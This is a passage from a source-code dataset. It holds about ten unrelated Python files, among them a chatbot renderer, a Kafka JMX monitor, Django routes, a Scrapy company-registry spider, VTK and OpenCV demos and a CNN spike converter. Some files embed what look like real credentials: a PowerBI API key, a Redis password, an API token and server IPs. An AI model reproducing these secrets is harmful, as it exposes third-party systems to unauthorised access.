response.startswith('api_call_rhetorical_'):\n entity = response.replace('api_call_rhetorical_', '')\n if entity in avails and len(avails[entity]) > 0:\n return '我们有' + \",\".join(avails[entity])\n else:\n return np.random.choice(['您好,我们这里卖各种空调电视电脑冰箱等,价格不等,您可以来看看呢',\n '您好啊,这里有各种冰箱空调电视等,价格在3000-18000,您可以来看看呢'])\n if response.startswith('api_call_search_'):\n tokens = response.replace('api_call_search_', '').split(',')\n\n and_mapper = dict()\n or_mapper = dict()\n for t in tokens:\n key, value = t.split(':')\n if key == 'price':\n or_mapper[key] = value\n else:\n and_mapper[key] = value\n docs = solr_util.query(and_mapper, or_mapper)\n if len(docs) > 0:\n doc = docs[0]\n if 'discount' in doc and doc['discount']:\n return '为您推荐' + doc['title'][0] + ',目前' + doc['discount'][0]\n else:\n return '为您推荐' + doc['title'][0]\n else:\n # use loose search, brand and category is mandatory\n and_mapper.clear()\n or_mapper.clear()\n for t in tokens:\n key, value = t.split(':')\n if key in ['category', 'brand']:\n and_mapper[key] = value\n else:\n or_mapper[key] = value\n docs = solr_util.query(and_mapper, or_mapper)\n if len(docs) > 0:\n doc = docs[0]\n if 'discount' in doc and doc['discount']:\n return '没有找到完全符合您要求的商品,为您推荐' + doc['title'][0] + ',目前' + doc['discount'][0]\n else:\n return '没有找到完全符合您要求的商品,为您推荐' + doc['title'][0]\n return response\n\n if response.startswith('api_call_query_price_'):\n params = response.replace('api_call_query_price_' ,'')\n if not params:\n return '价位在3000-18000'\n else:\n mapper = dict()\n for kv in params.split(','):\n key, value = kv.split(':')\n mapper[key] = value\n\n facet = solr_util.solr_facet(mappers=mapper, facet_field='price', is_range=True)\n response = self.render_mapper(mapper) + '目前价位在' + ','.join(facet[0])\n return response\n\n if response.startswith('api_call_query_brand_'):\n params = response.replace('api_call_query_brand_' ,'')\n if not params:\n raise ValueError('api_call_query must have params provided...')\n else:\n mapper = dict()\n for kv in params.split(','):\n key, value = kv.split(':')\n mapper[key] = value\n\n facet = solr_util.solr_facet(mappers=mapper, facet_field='brand', is_range=False)\n response = self.render_mapper(mapper) + '有' + ','.join(facet[0])\n return response\n\n if response.startswith('api_call_query_location_'):\n params = response.replace('api_call_query_location_', '')\n if not params:\n return '无法查阅'\n else:\n mapper = dict()\n for kv in params.split(','):\n key, value = kv.split(':')\n mapper[key] = value\n facet = solr_util.solr_facet(mappers=mapper, facet_field='location', is_range=False)\n response = '您要找的' + self.render_mapper(mapper) + '在' + ','.join(facet[0])\n return response\n\n return response\n except:\n print(traceback.format_exc())\n matched, answer, score = self.interactive.get_responses(\n query=q)\n logging.error(\"C@code:{}##error_details:{}\".format('render', traceback.format_exc()))\n return answer\n","sub_path":"src/kernel/render.py","file_name":"render.py","file_ext":"py","file_size_in_byte":9359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"180727689","text":"from jmxquery import JMXConnection, JMXQuery\nimport requests, json\nfrom datetime import datetime, timezone\n\nDWH7 = '42.119.252.86'\nKAFKA01 = '183.80.199.4'\nKAFKA02 = '183.80.199.5'\nKAFKA03 = '118.69.190.39'\n#JMX_PORT = 9999\nJMX_PORT = 9996\n# KAFKA_HOST = DWH7\nJVM_HOSTS = [KAFKA01, KAFKA02, KAFKA03]\n\nMSG_IN_PER_TOPIC_PER_BROKER_URL = 
\"https://api.powerbi.com/beta/658d257f-4608-4ae9-85f3-61f7e4628c97/datasets/d8662276-5a29-476b-b671-7eee054cba2e/rows?key=u%2BKEPzyfUc%2FFOrcFh735wN%2BzNGYKNB365v53ouZSiksBPer26%2BrsVV7%2FE6%2FIXiza8j9DPqJlwaz3mKPW5iUhOA%3D%3D\"\n\n# function to send real_time data to PowerBI-------------\ndef getpayload_msginperbrokerpertopic(metrics_dict, timestamp):\n payload = []\n for socket, metrics in metrics_dict.items():\n for metric in metrics:\n if metric.attribute in ['Count', 'OneMinuteRate']:\n record = {}\n record['timestamp'] = timestamp\n record['host'] = socket\n record['topic'] = metric.metric_labels['topic']\n record['attribute'] = metric.attribute\n record['value'] = metric.value\n payload.append(record) \n return payload\n\ndef jmx_query(jvmHosts, jmxPort, jmxQuery):\n metrics_dict = {}\n timestamp = datetime.now().isoformat(timespec='seconds')\n for host in jvmHosts:\n jmxConnection = JMXConnection(f\"service:jmx:rmi:///jndi/rmi://{host}:{jmxPort}/jmxrmi\")\n jmxQuery = jmxQuery\n metrics = jmxConnection.query(jmxQuery)\n metrics_dict[host] = metrics\n return metrics_dict, timestamp \n\ndef print_metrics_dict(metrics_dict):\n for key, value in metrics_dict.items():\n print(key)\n for metric in value:\n print(f'\\t{metric.metric_name}, {metric.metric_labels}, {metric.value}')\n#JMX--------------\ntestQuery = [\n JMXQuery(mBeanName=\"kafka.server:type=BrokerTopicMetrics,name=MessagesInPerSec,topic=*\", \n metric_name=\"{name}---{topic}---{attribute}\")]\n\nmsgInPerTopicPerBrokerQuery = [\n JMXQuery(mBeanName=\"kafka.server:type=BrokerTopicMetrics,name=MessagesInPerSec,topic=*\", \n metric_name=\"{name}\",\n metric_labels={'topic':'{topic}'})]\n\n#metrics_dict, timestamp = jmx_query(JVM_HOSTS, JMX_PORT, testQuery)\n#print_metrics_dict(metrics_dict)\n\nmetrics_dict, timestamp = jmx_query(JVM_HOSTS, JMX_PORT, msgInPerTopicPerBrokerQuery)\np = getpayload_msginperbrokerpertopic(metrics_dict, timestamp)\nfor record in p:\n print(record)\n\n\n\n\n\n\n\n\n","sub_path":"test-print-msginpertopicperbroker.py","file_name":"test-print-msginpertopicperbroker.py","file_ext":"py","file_size_in_byte":2497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"442534514","text":"from django.contrib import admin\nfrom django.urls import path, include\nfrom . 
import views\n\nurlpatterns = [\n    # login, find ID/password, sign up\n    path('login/', views.login, name='login_customer'),\n    # path('idpw_search/', views.idpw_search, name='idpw_search_customer'),\n    path('signUp/', views.signUp, name='signUp_customer'),\n\n    path('main/', views.main, name='main_customer'),\n\n    # place an order\n    # if the user wants to change the location or pickup date on screen, the url may have to change..(?)\n    # main screen (location and pickup-date selection screen)\n    # path('order/', views.searchStoreList, name='searchStorelist_customer'),\n    # # screen that shows the store list.\n    # # (pickup date, location (re-selectable?), sort criteria <taste rating, service rating, design rating, overall rating>, store-name search, store list <store name, store location, phone number, overall rating>)\n    # path('order/matchedStoreList', views.storeList, name='matchedStoreList_customer'),\n    # # screen that shows the cake list of the selected store.\n    # # (store name, orderable dates (calendar), store introduction, pickup date (re-selectable?), pickup time, cake list <cake photo, cake name, minimum cake price, mini-size availability>)\n    # path('order/selectedStoreCakeList', views.cakeList, name='selectedStoreCakeList_customer'),\n    # # store info shown when the store name is selected on the cake-list screen\n    # # (business hours, phone number,, is this enough?)\n    # path('order/selectedStoreCakeList/storeInfo', views.storeInfo, name='storeInfo_customer'),\n    # # my own custom cake\n    # # (selected cake photo, option selection <required options, optional options <choices, price>>, message from the owner, color combination)\n    # path('order/selectedCake', views.selectedCake, name='selectedCake_customer'),\n    # # a different url for each color-combination choice? the color selection screens are probably separate\n    # path('order/selectedCake/backgroundColor', views.backgroundColor, name='backgroundColor_customer'),\n    # path('order/selectedCake/textColor', views.textColor, name='textColor_customer'),\n    # path('order/selectedCake/creamColor', views.creamColor, name='creamColor_customer'),\n\n    # order history lookup\n    # (pickup date, pickup time, selected cake image, final price, ordering store, order progress, order number(?))\n    path('orderList/', views.orderlist, name='orderList_customer'),\n    # should 'edit order' be a separate page from selectedCake, or the same screen with the info filled in automatically?\n    # path('orderList/changeOrder', views.changeOrder, name='changeOrder_customer'),\n\n    # my page\n    # (email (changeable?), password, name, mobile number,,)\n    path('mypage/', views.mypage, name='mypage_customer')\n]\n","sub_path":"customer/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"185762869","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\ndef solve():\n    m = [input() for _ in range(4)]\n    input()\n    def check(line,el):\n        for x in line:\n            if x!='T' and x!=el:\n                return False\n        return True\n    lines = m + list(zip(*m)) + [m[0][0]+m[1][1]+m[2][2]+m[3][3],m[0][3]+m[1][2]+m[2][1]+m[3][0]]\n    for line in lines:\n        if check(line,'X'):\n            print ('X won')\n            return\n        if check(line,'O'):\n            print ('O won')\n            return\n    if '.' 
in ''.join(m):\n print (\"Game has not completed\")\n else:\n print (\"Draw\")\n\nif __name__==\"__main__\":\n T = int(input())\n for t in range(1,T+1):\n print(\"Case #%d:\"%t,end=' ')\n solve()\n","sub_path":"solutions_2453486_0/Python/alberist2/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"129940269","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\n \nimport sys\nimport os.path\n\nfrom PyQt4 import QtCore, QtGui\nQtCore.Signal = QtCore.pyqtSignal\n\nimport vtk\nfrom vtk.qt4.QVTKRenderWindowInteractor import QVTKRenderWindowInteractor\n\nclass VTKFrame(QtGui.QFrame):\n def __init__(self, parent = None):\n super(VTKFrame, self).__init__(parent)\n\n self.vtkWidget = QVTKRenderWindowInteractor(self)\n vl = QtGui.QVBoxLayout(self)\n vl.addWidget(self.vtkWidget)\n vl.setContentsMargins(0, 0, 0, 0)\n \n self.ren = vtk.vtkRenderer()\n self.ren.SetBackground(0.3, 0.4, 0.5)\n self.vtkWidget.GetRenderWindow().AddRenderer(self.ren)\n self.iren = self.vtkWidget.GetRenderWindow().GetInteractor()\n \n # Create lines.\n points = vtk.vtkPoints()\n points.InsertPoint(0, 0, 0, 1)\n points.InsertPoint(1, 1, 0, 0)\n points.InsertPoint(2, 0, 1, 0)\n points.InsertPoint(3, 1, 1, 1)\n\n line1 = vtk.vtkLine()\n line1.GetPointIds().SetId(0, 0)\n line1.GetPointIds().SetId(1, 1)\n\n line2 = vtk.vtkLine()\n line2.GetPointIds().SetId(0, 2)\n line2.GetPointIds().SetId(1, 3)\n\n lines = vtk.vtkCellArray()\n lines.InsertNextCell(line1)\n lines.InsertNextCell(line2)\n\n polyData = vtk.vtkPolyData()\n polyData.SetPoints(points)\n polyData.SetLines(lines)\n\n ruledSurfaceFilter = vtk.vtkRuledSurfaceFilter()\n ruledSurfaceFilter.SetInputConnection(polyData.GetProducerPort())\n\n ruledSurfaceFilter.SetResolution(21, 21)\n ruledSurfaceFilter.SetRuledModeToResample()\n \n # Create a mapper\n mapper = vtk.vtkPolyDataMapper()\n mapper.SetInputConnection(ruledSurfaceFilter.GetOutputPort())\n \n # Create an actor\n actor = vtk.vtkActor()\n actor.SetMapper(mapper)\n actor.GetProperty().SetColor(0.89, 0.81, 0.34)\n \n self.ren.AddActor(actor)\n self.ren.ResetCamera()\n\n self._initialized = False\n\n def showEvent(self, evt):\n if not self._initialized:\n self.iren.Initialize()\n self.startTimer(30)\n self._initialized = True\n\n def timerEvent(self, evt):\n self.ren.GetActiveCamera().Azimuth(1)\n self.vtkWidget.GetRenderWindow().Render()\n \nclass MainPage(QtGui.QMainWindow):\n def __init__(self, parent = None):\n super(MainPage, self).__init__(parent)\n self.setCentralWidget(VTKFrame())\n\n self.setWindowTitle(\"Ruled Surface Filter example\")\n\n def categories(self):\n return ['Filters']\n\n def mainClasses(self):\n return ['vtkRuledSurfaceFilter', 'vtkLine', 'vtkPoints', 'vtkCellArray']\n\nif __name__ == '__main__':\n app = QtGui.QApplication(sys.argv)\n w = MainPage()\n w.show()\n sys.exit(app.exec_())\n","sub_path":"ruledsurfacefilter.py","file_name":"ruledsurfacefilter.py","file_ext":"py","file_size_in_byte":2818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"389964494","text":"# -*- coding: utf-8 -*-\nimport scrapy\nimport redis\nfrom scrapy import Selector\nfrom scrapy.http import Request\nimport time\nimport random\nimport json\n\n\n\nclass ShanxiJianzhuImformationSpider(scrapy.Spider):\n name = 'reverse_zhejiang'\n\n def start_requests(self):\n pool = redis.ConnectionPool(host='106.12.112.205', password='tongna888')\n 
self.r = redis.Redis(connection_pool=pool)\n self.url = 'http://115.29.2.37:8080/enterprise_ajax.php'\n self.index = 1\n self.flag = True\n self.x = True\n self.token = 'LnHRF8R1jmqOLFnnK048DcokeilQRDS2'\n self.company_url = 'http://115.29.2.37:8080/'\n yield scrapy.Request(url=self.url, callback=self.parse)\n\n def parse(self, response):\n psot_forma_data = {}\n if self.x:\n topage = Selector(response=response).xpath('//div[@id=\"pagebar\"]/ul/li[4]/@alt').extract_first()\n name = Selector(response=response).xpath('//div[@id=\"pagebar\"]/ul/li[4]/text()').extract_first()\n self.x = False\n else:\n topage = Selector(response=response).xpath('//div[@id=\"pagebar\"]/ul/li[2]/@alt').extract_first()\n name = Selector(response=response).xpath('//div[@id=\"pagebar\"]/ul/li[2]/text()').extract_first()\n print(topage, name)\n psot_forma_data['page'] = topage\n tr = Selector(response=response).xpath('//table[@class=\"t1\"]/tr')\n print(len(tr))\n del tr[0]\n print(len(tr))\n for t in tr:\n td = t.xpath('./td')\n url = td[1].xpath('./div/a/@href').extract_first()\n url = self.company_url + url\n print(url, 'zzzzzzzzzzzzzzzzzzzzzzzzzzzzzz')\n yield Request(url=url, callback=self.company_information,\n dont_filter=True,\n )\n # page = Selector(response=response).xpath('//div[@id=\"pagebar\"]/ul/li[3]/@alt').extract_first()\n self.index = self.index + 1\n if not self.index == 5:\n yield scrapy.FormRequest(url=self.url,\n formdata={'page': topage},\n callback=self.parse,\n dont_filter=True)\n\n def company_information(self, response):\n # print(response.text)\n company_name = Selector(response=response).xpath('//td[@colspan=\"5\"]')[0].xpath('text()').extract_first()\n # company_name = Selector(response=response).xpath('//td[@colspan=\"5\"]')\n print(company_name)\n address = Selector(response=response).xpath('//td[@colspan=\"5\"]/text()')[1].extract()\n number = Selector(response=response).xpath('//div[@class=\"detail_list\"]/table/tr[2]/td[6]/text()').extract_first()\n person_name = Selector(response=response).xpath('//div[@class=\"detail_list\"]/table/tr[7]/td[2]/text()').extract_first()\n print(company_name, address, number, person_name, 'AAAAAAAAAAAAAAAAAAAAAA')\n print(company_name, number, person_name, 'AAAAAAAAAAAAAAAAAAAAAA')\n data = {}\n print()\n data['companyName'] = company_name\n number = number.split()\n if number != []:\n number = number[0]\n if len(number) == 18:\n data['licenseNum'] = number\n else:\n data['licenseNum'] = ''\n else:\n data['licenseNum'] = ''\n person_name = person_name.split()\n print(person_name, type(person_name), 'AAAAAAAAAAAAAAAAAAAA')\n if person_name != []:\n person_name = person_name[0]\n print(person_name)\n data['contactMan'] = person_name\n else:\n data['contactMan'] = ''\n if address != None:\n adderss = address.split()[0]\n data['contactAddress'] = adderss\n else:\n data['contactAddress'] = ''\n data['companyArea'] = '浙江省'\n data['area'] = ''\n data['contactPhone'] = ''\n data['token'] = self.token\n print(data)\n yield scrapy.Request(\n url='https://api.maotouin.com/rest/companyInfo/addCompanyRecord.htm',\n # url='http://192.168.199.188:8080/web/rest/companyInfo/addCompanyRecord.htm',\n method=\"POST\",\n headers={'Content-Type': 'application/json'},\n body=json.dumps(data),\n callback=self.zz,\n meta={'company_name': company_name, 'data': data},\n dont_filter=True\n )\n\n def zz(self, response):\n not_company_code = json.loads(response.text)['code']\n not_search_company_name = response.meta['company_name']\n zz_data = response.meta['data']\n 
self.r.sadd('all_company_name', not_search_company_name)\n        print(response.text)\n        data = json.dumps(zz_data, ensure_ascii=False)\n        print(response.meta['data'], 'aaaaaaaaaaaaaaaaaa')\n        if not_company_code == -102:\n            self.r.sadd('title_name1', not_search_company_name)\n            self.r.sadd('title_102', data)\n            self.r.sadd('title_name3', not_search_company_name)\n            print(not_search_company_name, 'company not found')\n        else:\n            print(not_search_company_name, 'company found')\n\n\n","sub_path":"shanxi_jianzhu/shanxi_jianzhu/spiders/reverse_zhejiang.py","file_name":"reverse_zhejiang.py","file_ext":"py","file_size_in_byte":5228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"226120058","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport json\nfrom whatnet.data.converter import ConverterBase\nimport whatnet.data.datasets.mnist as data_read\n\n\nclass CnnConverter(ConverterBase):\n    def __init__(self, param_file_path='../config/converter_config_default.json'):\n\n        with open(param_file_path, 'r') as f:\n            self.params = json.load(f)\n\n        super().__init__(28 * 28)\n        self.con_win_w = self.params['convolution_win_width']\n        self.con_win_h = self.params['convolution_win_height']\n        self.mp_win_w = self.params['max_pooling_win_width']\n        self.mp_win_h = self.params['max_pooling_win_height']\n\n        self.operation = self.params['operation']\n\n        # whether to use a custom kernel\n        self.__is_c_kernel = self.params['c_kernel']\n\n        # convolution kernel\n        self.kernel1 = []\n        self.kernel2 = []\n        self.kernel3 = []\n        self.kernel4 = []\n\n        # custom convolution kernel\n        self.kernels = {}\n\n        # initialize kernels\n        self.__init_kernel(self.con_win_w, self.con_win_h)\n        self.kernels = self.params['kernels']\n        if self.__is_c_kernel:\n            self.kernels_num = len(self.kernels.keys())\n        else:\n            self.kernels_num = 4\n\n        # training config\n        self.bias = 50.\n        self.inh_t = 35.\n        self.teacher = 75.\n\n        # converter function\n        self.converterFunc = self.params['converter_func']\n\n        # image width height\n        self.img_width = self.params['image_w']\n        self.img_height = self.params['image_h']\n\n        # pro_width pro_height\n        self.pro_width = self.params['image_w']\n        self.pro_height = self.params['image_h']\n        self.__init_pro_w_h()\n\n    def __init_kernel(self, con_w, con_h):\n        for i in range(con_h):\n            if i == int(con_h / 2):\n                self.kernel1.append([1] * con_w)\n            else:\n                self.kernel1.append([0] * con_w)\n\n        for i in range(con_h):\n            r = [0] * con_w\n            r[int(con_w / 2)] = 1\n            self.kernel2.append(r)\n\n        for i in range(con_h):\n            r = [0] * con_w\n            r[i] = 1\n            self.kernel3.append(r)\n\n        for i in range(con_h):\n            r = [0] * con_w\n            r[con_w - i - 1] = 1\n            self.kernel4.append(r)\n\n    def __init_pro_w_h(self):\n        self.pro_width = self.img_width\n        self.pro_height = self.img_height\n        for op in self.operation:\n            if op == 'convolution':\n                self.pro_width = self.pro_width - self.con_win_w + 1\n                self.pro_height = self.pro_height - self.con_win_h + 1\n            elif op == 'pooling':\n                self.pro_width = int(self.pro_width / self.mp_win_w)\n                self.pro_height = int(self.pro_height / self.mp_win_h)\n            else:\n                raise ValueError(\"No such operation in cnn_converter. You may try {\" + \"convolution or pooling\" + \"}.\")\n\n    def change_kernal(self, kernels):\n        mgs = np.shape(kernels)\n        self.kernel1 = np.array(kernels[0]).tolist()\n        self.kernel2 = np.array(kernels[1]).tolist()\n        self.kernel3 = np.array(kernels[2]).tolist()\n        self.kernel4 = np.array(kernels[3]).tolist()\n\n        self.con_win_w = mgs[1]\n        self.con_win_h = mgs[2]\n        self.__init_pro_w_h()\n\n    def get_kernels(self):\n        kernels = [] + self.kernel1 + self.kernel2 + self.kernel3 + self.kernel4\n        return np.array(kernels).flatten().reshape(4, 8, 8)\n\n    def ac_kernel(self, kernel):\n        self.kernels['ga_kernel'] = np.array(kernel).tolist()\n        self.kernels_num = 5\n\n    # data converter\n    # ------------------------------------------------------------------------------\n    def data(self, data, step=8):\n        spike_times = []\n        if not self.__is_c_kernel:\n            intermediate_result = self.pre_pro(data)\n        else:\n            intermediate_result = self.pre_pro_c(data)\n\n        max_p = self.get_max_value(intermediate_result)\n\n        for image_kernel in intermediate_result.values():\n            image_coved = self.function_conver(self.converterFunc, image_kernel, max_p, 0) + self.bias\n            c = self.add_spike(image_coved)\n            spike_times = spike_times + c\n\n        return spike_times\n\n    def target(self, target, inh=list()):\n        spike_times = [np.array([], dtype=np.float)] * 10\n        if len(inh) != 0:\n            for _ in set(inh):\n                spike_times[_] = np.array([self.inh_t], dtype=np.float)\n        spike_times[target] = np.array([self.teacher], dtype=np.float)\n        return spike_times\n\n    # value mapping\n    @staticmethod\n    def mapping(xo, vo_max, vo_min, vn_max, vn_min):\n        return (vn_max - vn_min) / (vo_max - vo_min) * (xo - vo_min) + vn_min\n\n    @staticmethod\n    def get_max_value(intermediate_result):\n        max_p = 0\n        for img in intermediate_result.values():\n            max_p = max(max_p, max(img.flatten()))\n        return max_p\n\n    @staticmethod\n    def __display_distribution(x, y):\n        plt.scatter(x, y, color=\"red\")\n        plt.show()\n\n    def function_conver(self, converfunc, data, max_value, min_value):\n        if converfunc == \"exponent\":\n            image_mapped = self.mapping(data.flatten(), max_value, min_value, 0, -np.log2(100))\n            return 0.5 ** np.array(image_mapped, dtype=np.float)\n        elif converfunc == \"power\":\n            image_mapped = self.mapping(data.flatten(), max_value, min_value, 0, -np.sqrt(99))\n            return np.array(image_mapped, dtype=np.float) ** 2 + 1\n        elif converfunc == \"linear\":\n            image_mapped = self.mapping(data.flatten(), max_value, min_value, 99, 0)\n            return 100 - np.array(image_mapped, dtype=np.float)\n        elif converfunc == \"inverse\":\n            image_mapped = self.mapping(data.flatten(), max_value, min_value, 100, 1)\n            return 100 / np.array(image_mapped, dtype=np.float)\n        else:\n            raise Exception(\"No such function!\")\n\n    def add_spike(self, image_coved):\n        spikes = []\n        for v in image_coved:\n            ss = round(v, 1)\n            if ss != 100. 
+ self.bias:\n spikes.append([ss])\n else:\n spikes.append([])\n return spikes\n\n # Convolution and Max Pooling\n # --------------------------------------\n\n @staticmethod\n def convolution(patch, kernal):\n return sum((patch * np.array(kernal, dtype=np.float)).flatten())\n\n def convolution_layer(self, data, kernal):\n image_shape = np.shape(data)\n image_data = np.array(data, dtype=np.float).flatten().reshape(image_shape[0], image_shape[1])\n self.pro_width = image_shape[0] - self.con_win_w + 1\n self.pro_height = image_shape[1] - self.con_win_h + 1\n con_image_data = [self.convolution(np.array(image_data[r:r + self.con_win_w, c:c + self.con_win_h], dtype=np.float), kernal=kernal)\n for r in range(image_shape[0] - self.con_win_w + 1)\n for c in range(image_shape[1] - self.con_win_h + 1)]\n return np.array(con_image_data, dtype=np.float).reshape(self.pro_width, self.pro_height)\n\n @staticmethod\n def max_pooling(patch):\n ret_value = max(patch.flatten())\n if ret_value <= 100:\n return 0\n else:\n return max(patch.flatten())\n\n def max_pooling_layer(self, data):\n image_shape = np.shape(data)\n image_data = np.array(data, dtype=np.float).flatten().reshape(image_shape[0], image_shape[1])\n self.pro_width = int(image_shape[0] / self.mp_win_w)\n self.pro_height = int(image_shape[1] / self.mp_win_h)\n mp_image_data = [self.max_pooling(np.array(image_data[r:r + self.mp_win_w, c:c + self.mp_win_h], dtype=np.float))\n for r in range(0, (self.pro_width - 1) * self.mp_win_w + 1, self.mp_win_w)\n for c in range(0, (self.pro_height - 1) * self.mp_win_h + 1, self.mp_win_h)]\n return np.array(mp_image_data, dtype=np.float).reshape(self.pro_width, self.pro_height)\n\n def pre_pro(self, data):\n intermediate_result = {'k1': data, 'k2': data, 'k3': data, 'k4': data}\n for op in self.operation:\n if op == 'convolution':\n intermediate_result['k1'] = self.convolution_layer(intermediate_result['k1'], kernal=self.kernel1)\n intermediate_result['k2'] = self.convolution_layer(intermediate_result['k2'], kernal=self.kernel2)\n intermediate_result['k3'] = self.convolution_layer(intermediate_result['k3'], kernal=self.kernel3)\n intermediate_result['k4'] = self.convolution_layer(intermediate_result['k4'], kernal=self.kernel4)\n elif op == 'pooling':\n intermediate_result['k1'] = self.max_pooling_layer(intermediate_result['k1'])\n intermediate_result['k2'] = self.max_pooling_layer(intermediate_result['k2'])\n intermediate_result['k3'] = self.max_pooling_layer(intermediate_result['k3'])\n intermediate_result['k4'] = self.max_pooling_layer(intermediate_result['k4'])\n return intermediate_result\n\n def pre_pro_c(self, data):\n intermediate_result = {}\n\n for key in self.kernels.keys():\n intermediate_result[key] = data\n\n for op in self.operation:\n if op == 'convolution':\n for key in self.kernels.keys():\n intermediate_result[key] = self.convolution_layer(intermediate_result[key], kernal=self.kernels[key])\n elif op == 'pooling':\n for key in self.kernels.keys():\n intermediate_result[key] = self.max_pooling_layer(intermediate_result[key])\n\n return intermediate_result\n\n @staticmethod\n def draw_data(ori_image, new_image=221):\n plt.subplot(new_image)\n plt.imshow(ori_image)\n\n\n# Unit Test\nif __name__ == \"__main__\":\n mnist = data_read.read_data_sets(\"../../scripts/data\")\n converter = CnnConverter(param_file_path='../../config/converter_config_default.json')\n\n image = mnist.train.data[1]\n print(\"Target %s\" % mnist.train.target[1])\n print(converter.pro_width, converter.pro_height)\n\n pre = 
converter.pre_pro_c(image)\n num = 1\n for value in pre.values():\n converter.draw_data(value, 220 + num)\n num += 1\n if num > 4:\n num = 1\n plt.figure()\n\n plt.show()\n","sub_path":"whatnet/data/cnn_converter.py","file_name":"cnn_converter.py","file_ext":"py","file_size_in_byte":10455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"621051122","text":"import numpy as np\r\nimport cv2\r\n\r\nimg1 = cv2.imread('img1.jpg', cv2.IMREAD_COLOR)\r\nimg2 = cv2.imread('logo2.jpg', cv2.IMREAD_COLOR)\r\n\r\nrows, cols, channels = img2.shape\r\nprint(\"rows, cols, channels are \", rows, cols, channels)\r\nroi = img1[0:rows, 0:cols]\r\ncv2.imshow('roi', roi)\r\n\r\nimg2gray = cv2.cvtColor(img2, cv2.COLOR_BGR2GRAY)\r\nret, mask1 = cv2.threshold(img2gray, 220, 255, cv2.THRESH_BINARY_INV)\r\nmask_inv = cv2.bitwise_not(mask1)\r\n\r\nimg1_bg = cv2.bitwise_and(roi, roi, mask=mask_inv)\r\nimg2_fg = cv2.bitwise_and(img2, img2, mask=mask1)\r\ndst = cv2.add(img1_bg, img2_fg)\r\nimg1[0:rows, 0:cols] = dst\r\n\r\ncv2.imshow('img2gray', img2gray)\r\ncv2.imshow('mask1', mask1)\r\ncv2.imshow('mask_inv', mask_inv)\r\ncv2.imshow('img1_bg', img1_bg)\r\ncv2.imshow('img2_fg', img2_fg)\r\ncv2.imshow('dst', dst)\r\ncv2.imshow('img1', img1)\r\n\r\n\r\n# add = img1 + img2\r\n# print(add)\r\n# print(\"-----------------------------\")\r\n# addn = cv2.add(img1, img2)\r\n# addn = cv2.subtract(img1, img2)\r\n\r\n# weighted = cv2.addWeighted(img1, 0.6, img2, 0.4, 0) \r\n\r\n# cv2.imshow('Added image', add)\r\n# cv2.imshow('Added image', weighted)\r\n\r\n\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()","sub_path":"src/cv/cv_arth.py","file_name":"cv_arth.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"346148974","text":"import numpy as np\nimport GradientDescent_2B as gd\nimport csv\nimport matplotlib.pyplot as plt\n\n\nclass LinearRegression(gd.GradientDescent):\n\n def __init__(self, dimension, data_feat, data_exp, alpha, threshold):\n super().__init__(dimension, data_feat, data_exp, alpha, threshold)\n if self.dimension != len(data_feat[0]):\n raise Exception(\"Invalid data set.\")\n\n ## Overridden cost function from superclass.\n def cost(self,feature):\n cos = 0\n\n for i in range(len(self.data_feat)):\n s = 0\n for j in range(len(self.data_feat[i])):\n s += feature[j]*self.data_feat[i][j]\n diff = s - self.data_exp[i]\n diff = diff*diff\n cos += diff\n\n cos = cos/(2*len(self.data_feat))\n return cos\n\n\n\n def predict(self,feature):\n if len(feature) != len(self.features):\n raise Exception(\"Unappropriate data.\")\n\n s = 0\n for i in range(len(feature)):\n s+= self.features[i]*feature[i]\n\n return s\n\n\n## __Main__\n\ndata_feat = [] #Training data set\ndata_exp = [] #Training expected values\n\ntest_feat = [] #Testing dataset\ntest_exp = [] #Testing Expected values\n\n\n\nwith open('data.csv') as data:\n csv_reader = csv.reader(data, delimiter=',')\n line_count = 0\n for row in csv_reader:\n if line_count == 0:\n pass\n line_count += 1\n else:\n if line_count < 8000:\n data_feat.append([1, int(row[0])/52, int(row[1])/37937, int(row[2])/5471, int(row[3])/35682, int(row[4])/5189, float(row[5])/15.0001])\n data_exp.append(float(row[6])/500001)\n line_count+=1\n else:\n test_feat.append([1, int(row[0])/52, int(row[1])/37937, int(row[2])/5471, int(row[3])/35682, int(row[4])/5189, float(row[5])/15.0001])\n test_exp.append(float(row[6])/500001)\n line_count+=1\n\n\n\ndemo 
= LinearRegression(7,data_feat,data_exp,1,0.01)\nn = int(input(\"Enter number of Iterations (For fast results enter 100) : \"))\nx = np.arange(0,n,10)\ny = []\nfor i in range(len(x)):\n demo.descent(10)\n y.append(demo.cost(demo.features))\n\nplt.plot(x,y)\nplt.ylabel(\"Cost Function\")\nplt.xlabel(\"Number of Iteration\")\nplt.show() #To display Variation of Cost function with number of iterations\n\npredicted = demo.predict([1,23,1106,252,790,230,1.8523])*500001\n\nprint(\"Predicted value for featureset {} is : {}\".format([1,23,1106,252,790,230,1.8523],predicted))","sub_path":"RL/Ishan Bawne/Week2/LinearRegression_2A.py","file_name":"LinearRegression_2A.py","file_ext":"py","file_size_in_byte":2546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"212125658","text":"from typing import final\nfrom django.shortcuts import render\n\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import api_view\n\nfrom .recommend import recommend\n\nimport pandas as pd\n\nimport json\nimport pickle\nimport warnings\nwarnings.filterwarnings('ignore')\n\n# Loading Dataset\ndata = pd.read_csv('animes.csv')\ndata.drop(['Unnamed: 0'], axis=1, inplace=True)\n\n# Loading Model\nmodel_file = open('nn_model.pkl', 'rb')\nmodel = pickle.load(model_file)\n\n# Create your views 